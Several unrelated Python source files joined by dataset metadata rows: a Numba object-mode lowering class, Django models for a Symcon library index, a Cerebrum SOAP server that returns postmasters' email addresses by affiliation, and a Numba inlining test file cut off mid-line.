# Issue #475: locals() is unsupported as calling it naively would give
# out wrong results.
_unsupported_builtins = set([locals])
# Map operators to methods on the PythonAPI class
PYTHON_OPMAP = {
'+': "number_add",
'-': "number_subtract",
'*': "number_multiply",
'/?': "number_divide",
'/': "number_truedivide",
'//': "number_floordivide",
'%': "number_remainder",
'**': "number_power",
'<<': "number_lshift",
'>>': "number_rshift",
'&': "number_and",
'|': "number_or",
'^': "number_xor",
}
class PyLower(BaseLower):
GeneratorLower = generators.PyGeneratorLower
def init(self):
# Strings to be frozen into the Environment object
self._frozen_strings = set()
self._live_vars = set()
def pre_lower(self):
super(PyLower, self).pre_lower()
self.init_pyapi()
def post_lower(self):
pass
def pre_block(self, block):
self.init_vars(block)
def lower_inst(self, inst):
if isinstance(inst, ir.Assign):
value = self.lower_assign(inst)
self.storevar(value, inst.target.name)
elif isinstance(inst, ir.SetItem):
target = self.loadvar(inst.target.name)
index = self.loadvar(inst.index.name)
value = self.loadvar(inst.value.name)
ok = self.pyapi.object_setitem(target, index, value)
self.check_int_status(ok)
elif isinstance(inst, ir.SetAttr):
target = self.loadvar(inst.target.name)
value = self.loadvar(inst.value.name)
ok = self.pyapi.object_setattr(target,
self._freeze_string(inst.attr),
value)
self.check_int_status(ok)
elif isinstance(inst, ir.DelAttr):
target = self.loadvar(inst.target.name)
ok = self.pyapi.object_delattr(target,
self._freeze_string(inst.attr))
self.check_int_status(ok)
elif isinstance(inst, ir.StoreMap):
dct = self.loadvar(inst.dct.name)
key = self.loadvar(inst.key.name)
value = self.loadvar(inst.value.name)
ok = self.pyapi.dict_setitem(dct, key, value)
self.check_int_status(ok)
elif isinstance(inst, ir.Return):
retval = self.loadvar(inst.value.name)
if self.generator_info:
# StopIteration
# We own a reference to the "return value", but we
# don't return it.
self.pyapi.decref(retval)
self.genlower.return_from_generator(self)
return
# No need to incref() as the reference is already owned.
self.call_conv.return_value(self.builder, retval)
elif isinstance(inst, ir.Branch):
cond = self.loadvar(inst.cond.name)
if cond.type == Type.int(1):
istrue = cond
else:
istrue = self.pyapi.object_istrue(cond)
zero = lc.Constant.null(istrue.type)
pred = self.builder.icmp(lc.ICMP_NE, istrue, zero)
tr = self.blkmap[inst.truebr]
fl = self.blkmap[inst.falsebr]
self.builder.cbranch(pred, tr, fl)
elif isinstance(inst, ir.Jump):
target = self.blkmap[inst.target]
self.builder.branch(target)
elif isinstance(inst, ir.Del):
self.delvar(inst.value)
elif isinstance(inst, ir.Raise):
if inst.exception is not None:
exc = self.loadvar(inst.exception.name)
# A reference will be stolen by raise_object() and another
# by return_exception_raised().
self.incref(exc)
else:
exc = None
self.pyapi.raise_object(exc)
self.return_exception_raised()
else:
raise NotImplementedError(type(inst), inst)
def lower_assign(self, inst):
"""
The returned object must have a new reference
"""
value = inst.value
if isinstance(value, (ir.Const, ir.FreeVar)):
return self.lower_const(value.value)
elif isinstance(value, ir.Var):
val = self.loadvar(value.name)
self.incref(val)
return val
elif isinstance(value, ir.Expr):
return self.lower_expr(value)
elif isinstance(value, ir.Global):
return self.lower_global(value.name, value.value)
elif isinstance(value, ir.Yield):
return self.lower_yield(value)
elif isinstance(value, ir.Arg):
value = self.fnargs[value.index]
self.incref(value)
return value
else:
raise NotImplementedError(type(value), value)
def lower_yield(self, inst):
yp = self.generator_info.yield_points[inst.index]
assert yp.inst is inst
self.genlower.init_generator_state(self)
# Save live vars in state
# We also need to save live vars that are del'ed afterwards.
y = generators.LowerYield(self, yp, yp.live_vars | yp.weak_live_vars)
y.lower_yield_suspend()
# Yield to caller
val = self.loadvar(inst.value.name)
# Let caller own the reference
self.pyapi.incref(val)
self.call_conv.return_value(self.builder, val)
# Resumption point
y.lower_yield_resume()
# None is returned by the yield expression
return self.pyapi.make_none()
def lower_binop(self, expr, op, inplace=False):
lhs = self.loadvar(expr.lhs.name)
rhs = self.loadvar(expr.rhs.name)
if op in PYTHON_OPMAP:
fname = PYTHON_OPMAP[op]
fn = getattr(self.pyapi, fname)
res = fn(lhs, rhs, inplace=inplace)
else:
# Assumed to be rich comparison
res = self.pyapi.object_richcompare(lhs, rhs, expr.fn)
self.check_error(res)
return res
def lower_expr(self, expr):
if expr.op == 'binop':
return self.lower_binop(expr, expr.fn, inplace=False)
elif expr.op == 'inplace_binop':
return self.lower_binop(expr, expr.immutable_fn, inplace=True)
elif expr.op == 'unary':
value = self.loadvar(expr.value.name)
if expr.fn == '-':
res = self.pyapi.number_negative(value)
elif expr.fn == '+':
res = self.pyapi.number_positive(value)
elif expr.fn == 'not':
res = self.pyapi.object_not(value)
self.check_int_status(res)
longval = self.builder.zext(res, self.pyapi.long)
res = self.pyapi.bool_from_long(longval)
elif expr.fn == '~':
res = self.pyapi.number_invert(value)
else:
raise NotImplementedError(expr)
self.check_error(res)
return res
elif expr.op == 'call':
argvals = [self.loadvar(a.name) for a in expr.args]
fn = self.loadvar(expr.func.name)
if not expr.kws:
# No keyword
ret = self.pyapi.call_function_objargs(fn, argvals)
else:
# Have Keywords
keyvalues = [(k, self.loadvar(v.name)) for k, v in expr.kws]
args = self.pyapi.tuple_pack(argvals)
kws = self.pyapi.dict_pack(keyvalues)
ret = self.pyapi.call(fn, args, kws)
self.decref(kws)
self.decref(args)
self.check_error(ret)
return ret
elif expr.op == 'getattr':
obj = self.loadvar(expr.value.name)
res = self.pyapi.object_getattr(obj, self._freeze_string(expr.attr))
self.check_error(res)
return res
elif expr.op == 'build_tuple':
items = [self.loadvar(it.name) for it in expr.items]
res = self.pyapi.tuple_pack(items)
self.check_error(res)
return res
elif expr.op == 'build_list':
items = [self.loadvar(it.name) for it in expr.items]
res = self.pyapi.list_pack(items)
self.check_error(res)
return res
elif expr.op == 'build_map':
res = self.pyapi.dict_new(expr.size)
self.check_error(res)
for k, v in expr.items:
key = self.loadvar(k.name)
value = self.loadvar(v.name)
ok = self.pyapi.dict_setitem(res, key, value)
self.check_int_status(ok)
return res
elif expr.op == 'build_set':
items = [self.loadvar(it.name) for it in expr.items]
res = self.pyapi.set_new()
self.check_error(res)
for it in items:
ok = self.pyapi.set_add(res, it)
self.check_int_status(ok)
return res
elif expr.op == 'getiter':
obj = self.loadvar(expr.value.name)
res = self.pyapi.object_getiter(obj)
self.check_error(res)
return res
elif expr.op == 'iternext':
iterobj = self.loadvar(expr.value.name)
item = self.pyapi.iter_next(iterobj)
is_valid = cgutils.is_not_null(self.builder, item)
pair = self.pyapi.tuple_new(2)
with self.builder.if_else(is_valid) as (then, otherwise):
with then:
self.pyapi.tuple_setitem(pair, 0, item)
with otherwise:
self.check_occurred()
# Make the tuple valid by inserting None as dummy
# iteration "result" (it will be ignored).
self.pyapi.tuple_setitem(pair, 0, self.pyapi.make_none())
self.pyapi.tuple_setitem(pair, 1, self.pyapi.bool_from_bool(is_valid))
return pair
elif expr.op == 'pair_first':
pair = self.loadvar(expr.value.name)
first = self.pyapi.tuple_getitem(pair, 0)
self.incref(first)
return first
elif expr.op == 'pair_second':
pair = self.loadvar(expr.value.name)
second = self.pyapi.tuple_getitem(pair, 1)
self.incref(second)
return second
elif expr.op == 'exhaust_iter':
iterobj = self.loadvar(expr.value.name)
tup = self.pyapi.sequence_tuple(iterobj)
self.check_error(tup)
# Check tuple size is as expected
tup_size = self.pyapi.tuple_size(tup)
expected_size = self.context.get_constant(types.intp, expr.count)
has_wrong_size = self.builder.icmp(lc.ICMP_NE,
tup_size, expected_size)
with cgutils.if_unlikely(self.builder, has_wrong_size):
self.return_exception(ValueError)
return tup
elif expr.op == 'getitem':
value = self.loadvar(expr.value.name)
index = self.loadvar(expr.index.name)
res = self.pyapi.object_getitem(value, index)
self.check_error(res)
return res
elif expr.op == 'static_getitem':
value = self.loadvar(expr.value.name)
index = self.context.get_constant(types.intp, expr.index)
indexobj = self.pyapi.long_from_ssize_t(index)
self.check_error(indexobj)
res = self.pyapi.object_getitem(value, indexobj)
self.decref(indexobj)
self.check_error(res)
return res
elif expr.op == 'getslice':
target = self.loadvar(expr.target.name)
start = self.loadvar(expr.start.name)
stop = self.loadvar(expr.stop.name)
slicefn = self.get_builtin_obj("slice")
sliceobj = self.pyapi.call_function_objargs(slicefn, (start, stop))
self.decref(slicefn)
self.check_error(sliceobj)
res = self.pyapi.object_getitem(target, sliceobj)
self.check_error(res)
return res
elif expr.op == 'cast':
val = self.loadvar(expr.value.name)
self.incref(val)
return val
else:
raise NotImplementedError(expr)
def lower_const(self, const):
# All constants are frozen inside the environment
index = self.env_manager.add_const(const)
ret = self.env_manager.read_const(index)
self.check_error(ret)
self.incref(ret)
return ret
def lower_global(self, name, value):
"""
1) Check global scope dictionary.
2) Check __builtins__.
2a) is it a dictionary (for non __main__ module)
2b) is it a module (for __main__ module)
"""
moddict = self.get_module_dict()
obj = self.pyapi.dict_getitem(moddict, self._freeze_string(name))
self.incref(obj) # obj is borrowed
try:
if value in _unsupported_builtins:
raise ForbiddenConstruct("builtins %s() is not supported"
% name, loc=self.loc)
except TypeError:
# `value` is unhashable, ignore
pass
if hasattr(builtins, name):
obj_is_null = self.is_null(obj)
bbelse = self.builder.basic_block
with self.builder.if_then(obj_is_null):
mod = self.pyapi.dict_getitem(moddict,
self._freeze_string("__builtins__"))
builtin = self.builtin_lookup(mod, name)
bbif = self.builder.basic_block
retval = self.builder.phi(self.pyapi.pyobj)
retval.add_incoming(obj, bbelse)
retval.add_incoming(builtin, bbif)
else:
retval = obj
with cgutils.if_unlikely(self.builder, self.is_null(retval)):
self.pyapi.raise_missing_global_error(name)
self.return_exception_raised()
return retval
# -------------------------------------------------------------------------
def get_module_dict(self):
return self.env_body.globals
def get_builtin_obj(self, name):
# XXX The builtins dict could be bound into the environment
moddict = self.get_module_dict()
mod = self.pyapi.dict_getitem(moddict,
self._freeze_string("__builtins__"))
return self.builtin_lookup(mod, name)
def builtin_lookup(self, mod, name):
"""
Args
----
mod:
The __builtins__ dictionary or module, as looked up in
a module's globals.
name: str
The object to lookup
"""
fromdict = self.pyapi.dict_getitem(mod, self._freeze_string(name))
self.incref(fromdict) # fromdict is borrowed
bbifdict = self.builder.basic_block
with cgutils.if_unlikely(self.builder, self.is_null(fromdict)):
# This happen if we are using the __main__ module
frommod = self.pyapi.object_getattr(mod, self._freeze_string(name))
with cgutils.if_unlikely(self.builder, self.is_null(frommod)):
self.pyapi.raise_missing_global_error(name)
self.return_exception_raised()
bbifmod = self.builder.basic_block
builtin = self.builder.phi(self.pyapi.pyobj)
builtin.add_incoming(fromdict, bbifdict)
builtin.add_incoming(frommod, bbifmod)
return builtin
def check_occurred(self):
"""
Return if an exception occurred.
"""
err_occurred = cgutils.is_not_null(self.builder,
self.pyapi.err_occurred())
with cgutils.if_unlikely(self.builder, err_occurred):
self.return_exception_raised()
def check_error(self, obj):
"""
Return if *obj* is NULL.
"""
with cgutils.if_unlikely(self.builder, self.is_null(obj)):
self.return_exception_raised()
return obj
def check_int_status(self, num, ok_value=0):
"""
Raise an exception if *num* is smaller than *ok_value*.
"""
ok = lc.Constant.int(num.type, ok_value)
pred = self.builder.icmp(lc.ICMP_SLT, num, ok)
with cgutils.if_unlikely(self.builder, pred):
self.return_exception_raised()
def is_null(self, obj):
return cgutils.is_null(self.builder, obj)
def return_exception_raised(self):
"""
Return with the currently raised exception.
"""
self.cleanup_vars()
self.call_conv.return_exc(self.builder)
def init_vars(self, block):
"""
Initialize live variables for *block*.
"""
self._live_vars = set(self.interp.get_block_entry_vars(block))
def _getvar(self, name, ltype=None):
if name not in self.varmap:
self.varmap[name] = self.alloca(name, ltype=ltype)
return self.varmap[name]
def loadvar(self, name):
"""
Load the llvm value of the variable named *name*.
"""
# If this raises then the live variables analysis is wrong
assert name in self._live_vars, name
ptr = self.varmap[name]
val = self.builder.load(ptr)
with cgutils.if_unlikely(self.builder, self.is_null(val)):
self.pyapi.raise_missing_name_error(name)
self.return_exception_raised()
return val
def delvar(self, name):
"""
Delete the variable slot with the given name. This will decref
the corresponding Python object.
"""
# If this raises then the live variables analysis is wrong
self._live_vars.remove(name)
ptr = self._getvar(name) # initializes `name` if not already
self.decref(self.builder.load(ptr))
# This is a safety guard against double decref's, but really
# the IR should be correct and have only one Del per variable
# and code path.
self.builder.store(cgutils.get_null_value(ptr.type.pointee), ptr)
def storevar(self, value, name, clobber=False):
"""
Stores a llvm value and allocate stack slot if necessary.
The llvm value can be of arbitrary type.
"""
is_redefine = name in self._live_vars and not clobber
ptr = self._getvar(name, ltype=value.type)
if is_redefine:
old = self.builder.load(ptr)
else:
self._live_vars.add(name)
assert value.type == ptr.type.pointee, (str(value.type),
str(ptr.type.pointee))
self.builder.store(value, ptr)
# Safe to call decref even on non python object
if is_redefine:
self.decref(old)
def cleanup_vars(self):
"""
Cleanup live variables.
"""
for name in self._live_vars:
ptr = self._getvar(name)
self.decref(self.builder.load(ptr))
def alloca(self, name, ltype=None):
"""
Allocate a stack slot and initialize it to NULL.
The default is to allocate a pyobject pointer.
Use ``ltype`` to override.
"""
if ltype is None:
ltype = self.context.get_value_type(types.pyobject)
with self.builder.goto_block(self.entry_block):
ptr = self.builder.alloca(ltype, name=name)
self.builder.store(cgutils.get_null_value(ltype), ptr)
return ptr
def incref(self, value):
self.pyapi.incref(value)
def decref(self, value):
"""
This is allow to be called on non pyobject pointer, in which case
no code is inserted.
"""
lpyobj = self.context.get_value_type(types.pyobject)
if value.type.kind == lc.TYPE_POINTER:
if value.type != lpyobj:
pass
else:
self.pyapi.decref(value)
def _freeze_string(self, string):
"""
Freeze a Python string object into the code.
"""
return self.lower_const(string)
| bsd-2-clause | -6,673,226,271,149,968,000 | 35.357895 | 82 | 0.553465 | false | 3.913142 | false | false | false |
lociii/symcon-index | symcon/models.py | 1 | 7636 | # -*- coding: UTF-8 -*-
import markdown
from django.db import models
from django.utils.translation import ugettext_lazy as _
from model_utils.choices import Choices
from symcon import querysets
from symcon.common.util.markdown import MarkDownToHtml
class Repository(models.Model):
user = models.CharField(max_length=100, verbose_name=_('User'))
name = models.CharField(max_length=100, verbose_name=_('Name'))
last_update = models.DateTimeField(null=True, blank=True, verbose_name=_('Last update'))
def get_url(self):
return '{owner_url}/{name}'.format(owner_url=self.get_owner_url(), name=self.name)
def get_issue_url(self):
return '{repo}/issues'.format(repo=self.get_url())
def get_owner_url(self):
return 'https://github.com/{user}'.format(user=self.user)
class Meta:
verbose_name = _('Repository')
verbose_name_plural = _('Repositories')
unique_together = ('user', 'name')
class Branch(models.Model):
repository = models.ForeignKey(to='Repository', verbose_name=_('Repository'))
name = models.CharField(max_length=200, verbose_name=_('Branch'))
last_update = models.DateTimeField(null=True, blank=True, verbose_name=_('Last update'))
default = models.BooleanField(default=False, verbose_name=_('Default'))
def get_raw_url(self):
return self.repository.get_url() + '/raw/' + self.name
class Meta:
verbose_name = _('Branch')
verbose_name_plural = _('Branches')
unique_together = ('repository', 'name')
class Library(models.Model):
objects = querysets.LibraryQuerySet.as_manager()
repository = models.ForeignKey(to='Repository', verbose_name=_('Repository'))
uuid = models.UUIDField(verbose_name=_('Identifier'))
def get_default_librarybranch(self):
for librarybranch in self.librarybranch_set.all():
if librarybranch.branch.default:
return librarybranch
return None
class Meta:
verbose_name = _('Library')
verbose_name_plural = _('Libraries')
unique_together = ('repository', 'uuid')
class LibraryBranch(models.Model):
library = models.ForeignKey(to='Library', verbose_name=_('Library'))
branch = models.ForeignKey(to='Branch', verbose_name=_('Branch'))
name = models.CharField(max_length=200, blank=True, verbose_name=_('Name'))
title = models.TextField(blank=True, verbose_name=_('Title'))
description = models.TextField(blank=True, verbose_name=_('Description'))
req_ips_version = models.CharField(max_length=200, blank=True,
verbose_name=_('Minimum Symcon version'))
author = models.CharField(max_length=200, blank=True, verbose_name=_('Author'))
url = models.URLField(blank=True, verbose_name=_('URL'))
version = models.CharField(max_length=50, blank=True, verbose_name=_('Version'))
build = models.IntegerField(null=True, blank=True, verbose_name=_('Build'))
date = models.IntegerField(null=True, blank=True, verbose_name=_('Date'))
readme_markdown = models.TextField(blank=True, verbose_name=_('Readme MarkDown'))
readme_html = models.TextField(blank=True, verbose_name=_('Readme HTML'))
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
self.convert_readme()
super().save(force_insert, force_update, using, update_fields)
def convert_readme(self):
self.readme_html = MarkDownToHtml(
text=self.readme_markdown, branch=self.branch).transform()
def get_req_ips_version(self):
if self.req_ips_version:
return self.req_ips_version
return self.branch.name
class Meta:
verbose_name = _('Library branch')
verbose_name_plural = _('Library branches')
unique_together = ('library', 'branch')
ordering = ('-branch__default', 'name')
class LibraryBranchTag(models.Model):
librarybranch = models.ForeignKey(to='LibraryBranch', verbose_name=_('Library branch'))
name = models.CharField(max_length=200, verbose_name=_('Name'))
class Meta:
verbose_name = _('Library branch tag')
verbose_name_plural = _('Library branche tags')
unique_together = ('librarybranch', 'name')
ordering = ('librarybranch', 'name')
class Module(models.Model):
TYPE_CHOICES = Choices(
(0, 'core', _('Core')),
(1, 'io', _('I/O')),
(2, 'splitter', _('Splitter')),
(3, 'device', _('Device')),
(4, 'configurator', _('Configurator')),
)
librarybranch = models.ForeignKey(to='LibraryBranch', verbose_name=_('Library branch'))
uuid = models.UUIDField(verbose_name=_('Identifier'))
name = models.CharField(max_length=200, blank=True, verbose_name=_('Name'))
title = models.TextField(blank=True, verbose_name=_('Title'))
description = models.TextField(blank=True, verbose_name=_('Description'))
type = models.IntegerField(choices=TYPE_CHOICES, null=True, blank=True, verbose_name=_('Type'))
vendor = models.CharField(max_length=200, blank=True, verbose_name=_('Vendor'))
prefix = models.CharField(max_length=200, blank=True, verbose_name=_('Prefix'))
readme_markdown = models.TextField(blank=True, verbose_name=_('Readme MarkDown'))
readme_html = models.TextField(blank=True, verbose_name=_('Readme HTML'))
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
self.convert_readme()
super().save(force_insert, force_update, using, update_fields)
def convert_readme(self):
self.readme_html = MarkDownToHtml(
text=self.readme_markdown, branch=self.librarybranch.branch).transform()
class Meta:
verbose_name = _('Module')
verbose_name_plural = _('Modules')
unique_together = ('librarybranch', 'uuid')
class ModuleAlias(models.Model):
module = models.ForeignKey(to='Module', verbose_name=_('Module'))
name = models.CharField(max_length=200, verbose_name=_('Name'))
deleted = models.BooleanField(default=False, verbose_name=_('Marked for deletion'))
class Meta:
verbose_name = _('Module alias')
verbose_name_plural = _('Module aliases')
unique_together = ('module', 'name')
class ModuleParentRequirement(models.Model):
module = models.ForeignKey(to='Module', verbose_name=_('Module'))
uuid = models.UUIDField(verbose_name=_('Identifier'))
deleted = models.BooleanField(default=False, verbose_name=_('Marked for deletion'))
class Meta:
verbose_name = _('Module parent requirement')
verbose_name_plural = _('Module parent requirements')
unique_together = ('module', 'uuid')
class ModuleChildRequirement(models.Model):
module = models.ForeignKey(to='Module', verbose_name=_('Module'))
uuid = models.UUIDField(verbose_name=_('Identifier'))
deleted = models.BooleanField(default=False, verbose_name=_('Marked for deletion'))
class Meta:
verbose_name = _('Module child requirement')
verbose_name_plural = _('Module child requirements')
unique_together = ('module', 'uuid')
class ModuleImplementedRequirement(models.Model):
module = models.ForeignKey(to='Module', verbose_name=_('Module'))
uuid = models.UUIDField(verbose_name=_('Identifier'))
deleted = models.BooleanField(default=False, verbose_name=_('Marked for deletion'))
class Meta:
verbose_name = _('Module implemented requirement')
verbose_name_plural = _('Module implemented requirements')
unique_together = ('module', 'uuid')
| mit | -7,060,074,287,676,643,000 | 40.053763 | 99 | 0.660424 | false | 4.012612 | false | false | false |
unioslo/cerebrum | servers/cis/SoapPostmasterServer.py | 1 | 7241 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011, 2012 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""A SOAP server for giving Postmaster's what they want of information from
Cerebrum.
Note that the logger is twisted's own logger and not Cerebrum's. Since twisted
works in parallell the logger should not be blocked. Due to this, the format of
the logs is not equal to the rest of Cerebrum. This might be something to work
on later.
"""
from __future__ import unicode_literals
import sys
import getopt
from twisted.python import log
from rpclib.model.primitive import Unicode
from rpclib.model.complex import Array
from rpclib.decorator import rpc
from cisconf import postmaster as cisconf
from Cerebrum.Utils import dyn_import
from Cerebrum import Errors
from Cerebrum.modules.cis import SoapListener
class PostmasterServer(SoapListener.BasicSoapServer):
"""The SOAP commands available for the clients.
TODO: is the following correct anymore? Note that an instance of this class
is created for each incoming call.
"""
# Headers: no need for headers for e.g. session IDs in this web service.
# The class where the Cerebrum-specific functionality is done. This is
# instantiated per call, to avoid thread conflicts.
cere_class = None
# The hock for the site object
site = None
@rpc(Array(Unicode), Array(Unicode), Array(Unicode),
_returns=Array(Unicode))
def get_addresses_by_affiliation(ctx, status=None, skos=None, source=None):
"""Get primary e-mail addresses for persons that match given
criteria."""
if not source and not status:
raise Errors.CerebrumRPCException('Input needed')
return ctx.udc['postmaster'].get_addresses_by_affiliation(
status=status, skos=skos, source=source)
# Events for the project:
def event_method_call(ctx):
"""Event for incoming calls."""
ctx.udc['postmaster'] = ctx.service_class.cere_class()
PostmasterServer.event_manager.add_listener('method_call', event_method_call)
def event_exit(ctx):
"""Event for cleaning after a call, i.e. close up db connections. Since
twisted runs all calls in a pool of threads, we can not trust __del__.
"""
# TODO: is this necessary any more, as we now are storing it in the method
# context? Are these deleted after each call? Check it out!
if 'postmaster' in ctx.udc:
ctx.udc['postmaster'].close()
PostmasterServer.event_manager.add_listener('method_return_object', event_exit)
PostmasterServer.event_manager.add_listener('method_exception_object',
event_exit)
def usage(exitcode=0):
print """Usage: %s --port PORT --instance INSTANCE --logfile FILE
Fire up the Postmaster's webservice.
--port What port to run the server. Default: cisconf.PORT.
--interface What interface the server should listen to (default: 0.0.0.0)
Default: cisconf.INTERFACE.
--logfile Where to log. Default: cisconf.LOG_FILE.
--fingerprints A comma separated list of certificate fingerprints. If this
is set, client certificates that doesn't generate fingerprints
which are in this list gets blocked from the service.
Default: cisconf.FINGERPRINTS.
--instance The Cerebrum instance which should be used. E.g:
Cerebrum.modules.no.uio.PostmasterCommands/Commands
Default: cisconf.CEREBRUM_CLASS.
--unencrypted Don't use https
--help Show this and quit
"""
sys.exit(exitcode)
if __name__ == '__main__':
try:
opts, args = getopt.getopt(sys.argv[1:], 'h',
['port=', 'unencrypted', 'logfile=',
'help', 'fingerprints=', 'instance=',
'interface='])
except getopt.GetoptError as e:
print e
usage(1)
use_encryption = True
port = getattr(cisconf, 'PORT', 0)
logfilename = getattr(cisconf, 'LOG_FILE', None)
instance = getattr(cisconf, 'CEREBRUM_CLASS', None)
interface = getattr(cisconf, 'INTERFACE', None)
log_prefix = getattr(cisconf, 'LOG_PREFIX', None)
log_formatters = getattr(cisconf, 'LOG_FORMATTERS', None)
for opt, val in opts:
if opt in ('--logfile',):
logfilename = val
elif opt in ('--port',):
port = int(val)
elif opt in ('--unencrypted',):
use_encryption = False
elif opt in ('--instance',):
instance = val
elif opt in ('--interface',):
interface = val
elif opt in ('-h', '--help'):
usage()
else:
print "Unknown argument: %s" % opt
usage(1)
if not port or not logfilename or not instance:
print "Missing arguments or cisconf variables"
usage(1)
# Get the cerebrum class and give it to the server
module, classname = instance.split('/', 1)
mod = dyn_import(module)
cls = getattr(mod, classname)
PostmasterServer.cere_class = cls
log.msg("DEBUG: Cerebrum class used: %s" % instance)
private_key_file = None
certificate_file = None
client_ca = None
fingerprints = None
if interface:
SoapListener.TwistedSoapStarter.interface = interface
if use_encryption:
private_key_file = cisconf.SERVER_PRIVATE_KEY_FILE
certificate_file = cisconf.SERVER_CERTIFICATE_FILE
client_ca = cisconf.CERTIFICATE_AUTHORITIES
fingerprints = getattr(cisconf, 'FINGERPRINTS', None)
server = SoapListener.TLSTwistedSoapStarter(
port=int(port),
applications=PostmasterServer,
private_key_file=private_key_file,
certificate_file=certificate_file,
client_ca=client_ca,
client_fingerprints=fingerprints,
logfile=logfilename,
log_prefix=log_prefix,
log_formatters=log_formatters)
else:
server = SoapListener.TwistedSoapStarter(
port=int(port),
applications=PostmasterServer,
logfile=logfilename,
log_prefix=log_prefix,
log_formatters=log_formatters)
# to make it global and reachable (wrong, I know)
PostmasterServer.site = server.site
# If sessions' behaviour should be changed (e.g. timeout):
# server.site.sessionFactory = BasicSession
# Fire up the server:
server.run()
| gpl-2.0 | 7,271,564,093,782,399,000 | 32.836449 | 79 | 0.65502 | false | 3.92892 | false | false | false |
jriehl/numba | numba/tests/test_inlining.py | 1 | 8956 | from __future__ import print_function, absolute_import
import re
import numpy as np
from .support import TestCase, override_config, captured_stdout
import numba
from numba import unittest_support as unittest
from numba import jit, njit, types, ir, compiler
from numba.ir_utils import guard, find_callname, find_const, get_definition
from numba.targets.registry import CPUDispatcher
from numba.inline_closurecall import inline_closure_call
from .test_parfors import skip_unsupported
@jit((types.int32,), nopython=True)
def inner(a):
return a + 1
@jit((types.int32,), nopython=True)
def more(a):
return inner(inner(a))
def outer_simple(a):
return inner(a) * 2
def outer_multiple(a):
return inner(a) * more(a)
@njit
def __dummy__():
return
class InlineTestPipeline(numba.compiler.BasePipeline):
"""compiler pipeline for testing inlining after optimization
"""
def define_pipelines(self, pm):
name = 'inline_test'
pm.create_pipeline(name)
self.add_preprocessing_stage(pm)
self.add_with_handling_stage(pm)
self.add_pre_typing_stage(pm)
self.add_typing_stage(pm)
pm.add_stage(self.stage_pre_parfor_pass, "Preprocessing for parfors")
if not self.flags.no_rewrites:
pm.add_stage(self.stage_nopython_rewrites, "nopython rewrites")
if self.flags.auto_parallel.enabled:
pm.add_stage(self.stage_parfor_pass, "convert to parfors")
pm.add_stage(self.stage_inline_test_pass, "inline test")
pm.add_stage(self.stage_ir_legalization,
"ensure IR is legal prior to lowering")
self.add_lowering_stage(pm)
self.add_cleanup_stage(pm)
pm.add_stage(self.stage_preserve_final_ir, "preserve IR")
def stage_preserve_final_ir(self):
self.metadata['final_func_ir'] = self.func_ir.copy()
def stage_inline_test_pass(self):
# assuming the function has one block with one call inside
assert len(self.func_ir.blocks) == 1
block = list(self.func_ir.blocks.values())[0]
for i, stmt in enumerate(block.body):
if guard(find_callname,self.func_ir, stmt.value) is not None:
inline_closure_call(self.func_ir, {}, block, i, lambda: None,
self.typingctx, (), self.typemap, self.calltypes)
break
class TestInlining(TestCase):
"""
Check that jitted inner functions are inlined into outer functions,
in nopython mode.
Note that not all inner functions are guaranteed to be inlined.
We just trust LLVM's inlining heuristics.
"""
def make_pattern(self, fullname):
"""
Make regexpr to match mangled name
"""
parts = fullname.split('.')
return r'_ZN?' + r''.join([r'\d+{}'.format(p) for p in parts])
def assert_has_pattern(self, fullname, text):
pat = self.make_pattern(fullname)
self.assertIsNotNone(re.search(pat, text),
msg='expected {}'.format(pat))
def assert_not_has_pattern(self, fullname, text):
pat = self.make_pattern(fullname)
self.assertIsNone(re.search(pat, text),
msg='unexpected {}'.format(pat))
def test_inner_function(self):
with override_config('DUMP_ASSEMBLY', True):
with captured_stdout() as out:
cfunc = jit((types.int32,), nopython=True)(outer_simple)
self.assertPreciseEqual(cfunc(1), 4)
# Check the inner function was elided from the output (which also
# guarantees it was inlined into the outer function).
asm = out.getvalue()
prefix = __name__
self.assert_has_pattern('%s.outer_simple' % prefix, asm)
self.assert_not_has_pattern('%s.inner' % prefix, asm)
def test_multiple_inner_functions(self):
# Same with multiple inner functions, and multiple calls to
# the same inner function (inner()). This checks that linking in
# the same library/module twice doesn't produce linker errors.
with override_config('DUMP_ASSEMBLY', True):
with captured_stdout() as out:
cfunc = jit((types.int32,), nopython=True)(outer_multiple)
self.assertPreciseEqual(cfunc(1), 6)
asm = out.getvalue()
prefix = __name__
self.assert_has_pattern('%s.outer_multiple' % prefix, asm)
self.assert_not_has_pattern('%s.more' % prefix, asm)
self.assert_not_has_pattern('%s.inner' % prefix, asm)
@skip_unsupported
def test_inline_call_after_parfor(self):
# replace the call to make sure inlining doesn't cause label conflict
# with parfor body
def test_impl(A):
__dummy__()
return A.sum()
j_func = njit(parallel=True, pipeline_class=InlineTestPipeline)(
test_impl)
A = np.arange(10)
self.assertEqual(test_impl(A), j_func(A))
@skip_unsupported
def test_inline_update_target_def(self):
def test_impl(a):
if a == 1:
b = 2
else:
b = 3
return b
func_ir = compiler.run_frontend(test_impl)
blocks = list(func_ir.blocks.values())
for block in blocks:
for i, stmt in enumerate(block.body):
# match b = 2 and replace with lambda: 2
if (isinstance(stmt, ir.Assign) and isinstance(stmt.value, ir.Var)
and guard(find_const, func_ir, stmt.value) == 2):
# replace expr with a dummy call
func_ir._definitions[stmt.target.name].remove(stmt.value)
stmt.value = ir.Expr.call(ir.Var(block.scope, "myvar", loc=stmt.loc), (), (), stmt.loc)
func_ir._definitions[stmt.target.name].append(stmt.value)
#func = g.py_func#
inline_closure_call(func_ir, {}, block, i, lambda: 2)
break
self.assertEqual(len(func_ir._definitions['b']), 2)
@skip_unsupported
def test_inline_var_dict_ret(self):
# make sure inline_closure_call returns the variable replacement dict
# and it contains the original variable name used in locals
@numba.njit(locals={'b': numba.float64})
def g(a):
b = a + 1
return b
def test_impl():
return g(1)
func_ir = compiler.run_frontend(test_impl)
blocks = list(func_ir.blocks.values())
for block in blocks:
for i, stmt in enumerate(block.body):
if (isinstance(stmt, ir.Assign)
